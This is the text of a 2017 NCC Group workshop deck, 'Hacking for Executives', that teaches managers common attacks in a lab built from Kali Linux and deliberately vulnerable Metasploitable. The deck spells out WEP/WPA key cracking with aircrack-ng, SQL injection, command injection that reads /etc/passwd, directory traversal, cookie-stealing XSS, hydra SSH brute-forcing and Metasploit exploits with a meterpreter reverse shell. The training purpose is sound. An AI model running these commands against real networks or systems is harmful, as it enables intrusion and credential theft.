ntxissacsc5

1. Hacking for Executives
Basic Hacks Used by Real World Attackers
North Texas Cyber Security Conference
November 10th, 2017
Tony Cargile and Matt Nash

2. • Introductions
• Session 1
• Getting the Lab Set Up
• Configuring our Wifi Card
• Attacking WEP protected routers
• Brute forcing WPA protected routers
• Finish Up With A Q&A
• Session 2
• Enumeration
• Web Application Attacks
• Brute Force Attacks
• Accessing Backdoors
• Exploiting Known Vulnerabilities
Agenda

3. ~ tony$ whoami
• Principal Security Consultant at NCC Group
• Austin Office
• Specializing in Application Security and Security Development LifeCycle
• National Conferences on DANE and SDLC
• Background in Development
• Bachelor of Science in Computer Science from University of Texas at Austin
• Born and raised in Fort Worth, but don’t hold that against me

4. ~ matt$ whoami
• Security Consultant at NCC Group
• Austin Office
• Specializing in Application Security, Infrastructure Assessment,
and Forensics
• Certified Digital Forensic Investigator and Incident
Responder
• Background in System Administration
• Bachelor of Science in Food & Resource Economics from
University of Florida
• Born and raised in Florida - sometimes referred to as Florida Man
• (only some of the news stories are true)

5. What is this training
• This is not a BlackHat Training
• No technical experience needed
• The purpose of this training is to
teach basic attacks and tools to
managers and executives in
decision making roles within the
security realm.
• All the tools and labs are open
source and available online

6. The Lab
• Everyone will be constructing their own
“hacker lab” within their computer.
• The Lab will consist of two virtual
machines, controlled by VMware
Player:
• Kali Linux: A common attacker
Linux OS
• Metasploitable: A purposefully
vulnerable Linux OS
• This course is designed for Windows,
but 100% possible on Macs and Linux

7. The Wifi Lab
• SSID: NCC Lab 1
• WPA Password Protected
• BSSID: 00:1F:33:E5:2C:A1
• Password: ?
• SSID: NCC Lab 2
• WEP Protected
• BSSID: 68:7F:74:C4:D8:64
• Password: ?

8. Setting Up the Lab

9. Opening the USB
• 3 Files
• Kali Linux VM – 7zipped
• Metasploitable 2 VM – zipped
• VMware Player Windows Installer

10. VMWare Install
• First, start by running the VMware installer

11. VMWare Install
• Accept the EULA

12. VMware install
• No need to install the Enhanced Keyboard Driver

13. VMware install
• Determine whether you want to give VMware your data

14. VMware install

15. VMware install

16. Run VMware Player Once Installed
• Once installed, on first run it will ask for a license

17. Extracting the VMs

18. Extracting the VMs
• Extract to an easy to locate
address.
• Take note of where you extracted
• Don’t put it on the USB

19. Installing 7-Zip
Right-click on the 7-Zip installer and click “Run as administrator”

20. Installing 7-Zip
Enter administrator password and click “Yes”

21. Installing 7-Zip
Click “Install”

22. Installing 7-Zip

23. Installing 7-Zip
Open 7-Zip program and navigate to the folder containing the Kali archive

24. Installing 7-Zip
Select the Kali Archive and click “Extract”

25. Installing 7-Zip
Choose an extraction location and click “OK”

26. Extracting the VMs

27. Opening the VMs

28. Opening the VMs

29. Configuring the VMs
• This is an important step
for 2 reasons:
1. We need to make sure
that our VMs can talk to
each other.
2. We need to make sure
that we don’t expose our
VMs to the world.

30. Configuring the VMs
• Verify that the
Network Adapter says
“NAT”

31. Powering On Metasploitable

32. Powering On Metasploitable

33. Powering On Metasploitable

34. Powering On Metasploitable

35. Installing VMware Tools

36. Logging Into Metasploitable
• Default credentials:
• Username: msfadmin
• Password: msfadmin

37. Logged into Metasploitable

38. Getting the IP Address
INPUT: ifconfig
• Note the IP Address: we will need it later!

39. Powering on Kali
• You will go through the
same steps as when you
powered on Metasploitable.
• Click “I copied it”
• Don’t change the keyboard
timeout
• Install VMware tools.

40. Kali Starting Up

41. Enable Full Screen

42. Log into Kali
• Default credentials:
• Username: root
• Password: toor

43. Kali on Startup

44. Opening the terminal
• Unlike Windows, the task bar is on the top
• Kali now has the quick start bar on the left
• Click the black terminal icon

45. Getting Kali’s IP Address
COMMAND: ifconfig
• Note the IP Address: we will need it later!

46. Wireless Attacks

47. Connect USB WiFi Adapter to Kali
Plug in the provided USB wireless adapter and click
the “Show devices” icon in the top-right

48. Connect USB WiFi Adapter to Kali
Mouse over USB icon to display connected USB device

49. Connect USB WiFi Adapter to Kali
Right-click on USB icon and click “Connect (Disconnect from host)”

50. Connect USB WiFi Adapter to Kali

51. Verify Kali Sees the WiFi Adapter

52. Check the Name of the WiFi Interface
Open a Terminal window and use `ip addr` command to list network interfaces
INPUT: ip addr

53. Place WiFi Interface Into Monitor Mode
Use `airmon-ng` to place wlan0 interface into “monitor” mode
INPUT: airmon-ng start wlan0

54. Kill Problematic Processes
Use `airmon-ng` to kill processes which may cause problems with wireless interception
INPUT: airmon-ng check kill

55. Kill Problematic Processes
Use `airodump-ng` to search for nearby wireless access points
INPUT: airodump-ng wlan0mon

56. Nearby Wireless Access Points
We see two interesting access points – one with WEP encryption
(NCC Lab 2) and another with WPA encryption (NCC Lab 1)

57. Cracking WEP

58. Nearby Wireless Access Points
We see two interesting access points – one with WEP encryption
(NCC Lab 2) and another with WPA encryption (NCC Lab 1)

59. Capturing Wireless Traffic
Use `airodump-ng` to capture traffic to/from the identified WEP-encrypted access point
INPUT: airodump-ng –c 6 –bssid 68:7F:74:C4:D8:64 –ivs
–w Desktop/NCC-Lab-2/NCC-Lab-2_ivs wlan0mon

60. Capturing Wireless Traffic
Actively capturing data to/from the identified WEP-encrypted access point

61. Capturing Wireless Traffic
Using `aircrack-ng` against the captured wireless data
INPUT: aircrack-ng Desktop/NCC-Lab-2/NCC-Lab-2_ivs-01.ivs

62. Capturing Wireless Traffic
`aircrack-ng` has cracked the WEP key used to encrypt data
to/from this wireless access point

63. Capturing Wireless Traffic
`aircrack-ng` has cracked the WEP key used to
encrypt data to/from this wireless access point

64. Bruteforcing WPA

65. Nearby Wireless Access Points
We see two interesting access points – one with WEP encryption
(NCC Lab 2) and another with WPA encryption (NCC Lab 1)

66. Capturing Wireless Traffic
Use `airodump-ng` to capture traffic to/from the identified WPA-encrypted access point
INPUT: airodump-ng –c 11 –bssid 00:1F:33:E5:2C:A1
–w Desktop/NCC-Lab-1/NCC-Lab-1 wlan0mon

67. Capturing Wireless Traffic
Actively capturing data to/from the identified WPA-encrypted access point

68. Capturing Wireless Traffic
Using `aircrack-ng` against the captured wireless data
INPUT: aircrack-ng -b 00:1F:33:E5:2C:A1 –w /usr/share/wordlists/rockyou.txt
Desktop/NCC-Lab-1/NCC-Lab-1-01.cap

69. Capturing Wireless Traffic
`aircrack-ng` is attempting a brute force attack using the
passwords in the “rockyou” wordlist

70. Capturing Wireless Traffic
`aircrack-ng` has cracked the WPA key used to
encrypt data to/from this wireless access point

71. Web Application Attacks

72. Open the Web Browser
• Select the orange Firefox ESR icon
• Can also be selected by going to Applications

73. Browse to Metasploitable
• Input the IP Address of Metasploitable into the URL Bar

74. Welcome to DVWA

75. Turn on Easy Mode

76. The Reset Button

77. SQL Injection
• What is it?
• How prevalent is it?
• How much damage can it cause?

78. SQL Injection

79. SQL Injection

80. SQL Injection
• Error messages are great resources for Attackers!

81. SQL Injection
INPUT: ‘ or 1=1+’

82. SQL Injection
INPUT: ‘ UNION ALL SELECT user,password from users where 1=1+’

83. Command Injection
• What is it?
• How prevalent is it?
• How much damage can it cause?
• Similar to SQL Injection, but instead of injecting into SQL Database,
we are injecting into a command request by the web application server.

84. Command Injection
INPUT: 8.8.8.8

85. Command Injection

86. Command Injection
INPUT: 8.8.8.8; ls

87. Command Injection
INPUT: 8.8.8.8; whoami

88. Command Injection
INPUT: 8.8.8.8; cat /etc/passwd

89. Local File Inclusion/Directory Traversal
• What is it?
• How prevalent is it?
• How much damage can it cause?

90. Local File Inclusion/Directory Traversal

91. Local File Inclusion/Directory Traversal
INPUT: test.php

92. Local File Inclusion/Directory Traversal
INPUT: ../../phpinfo.php

93. Local File Inclusion/Directory Traversal
INPUT: ../../../../../../../../etc/passwd

94. Cross Site Scripting
• What is it?
• How prevalent is it?
• How much damage can it cause?

95. Stored Cross Site Scripting

96. Stored Cross Site Scripting

97. Stored Cross Site Scripting
INPUT: <img src=“http://bit.ly/2dtWOWN”>

98. Stored Cross Site Scripting

99. Stored Cross Site Scripting
INPUT: <script>alert(document.cookie);</script>

100. Stored Cross Site Scripting

101. Stored Cross Site Scripting
DON’T DO THIS: <script>document.location=“https://nccgroup.trust”;</script>

102. Reflected Cross Site Scripting

103. Reflected Cross Site Scripting

104. Reflected Cross Site Scripting

105. Reflected Cross Site Scripting

106. Reflected Cross Site Scripting

107. Reflected Cross Site Scripting

108. Network Penetration Attacks

109. Enumeration
INPUT: nmap -sV -p- 192.168.132.128

110. Enumeration

111. Brute Forcing Passwords
INPUT: hydra -l sys –P /usr/share/john/password.lst –t 4 192.168.132.128 ssh

112. Brute Forcing Passwords

113. Brute Forcing Passwords
INPUT: ssh sys@192.168.132.128

114. Running Metasploit
INPUT: msfconsole

115. Enumeration

116. Loading an Exploit
INPUT: use exploit/unix/ftp/vsftpd_234_backdoor

117. Loading an Exploit
INPUT: show options
INPUT: set RHOST 192.168.132.128

118. Running an Exploit
INPUT: run

119. Running an Exploit
INPUT: id
INPUT: whoami
INPUT: ls

120. Loading an Exploit
INPUT: use exploit/unix/misc/distcc_exec

121. Loading an Exploit
INPUT: show options
INPUT: set RHOST 192.168.132.128

122. Running an Exploit
INPUT: run
INPUT: id
INPUT: ls

123. Exploiting Java RMI Using Meterpreter
INPUT: use exploit/multi/misc/java_rmi_server
INPUT: show options

124. Exploiting Java RMI Using Meterpreter
INPUT: set RHOST 192.168.132.128
INPUT: set LHOST 192.168.132.129
INPUT: set PAYLOAD java/meterpreter/reverse_tcp
INPUT: run

125. Q&A

126. Contact Us
• Mitchell Merrick
• Strategic Account Manager
• Mitchell.Merrick@nccgroup.trust
• (512) 431-6213
• Tony Cargile
• Principal Security Consultant
• Tony.Cargile@nccgroup.trust
• Matt Nash
• Security Consultant
• Matt.Nash@nccgroup.trust
• www.nccgroup.trust
• https://www.linkedin.com/company/ncc-group/
• https://twitter.com/NCCGroupplc
• https://www.facebook.com/NCCGroupplc/
• https://plus.google.com/+nccgroup

127. 127
Office Locations
Europe
Manchester - Head Office
Basingstoke
Belgium
Cheltenham
Denmark
Edinburgh
Germany
Glasgow
Leatherhead
Leeds
Lithuania
London
Luxembourg
Milton Keynes
Spain
Sweden
Switzerland
The Netherlands
USA
Atlanta, GA
Austin, TX
Chicago, IL
New York, NY
San Francisco, CA
Seattle, WA
Sunnyvale, CA
Australia
Sydney
Canada
Kitchener, ON
Middle East
Dubai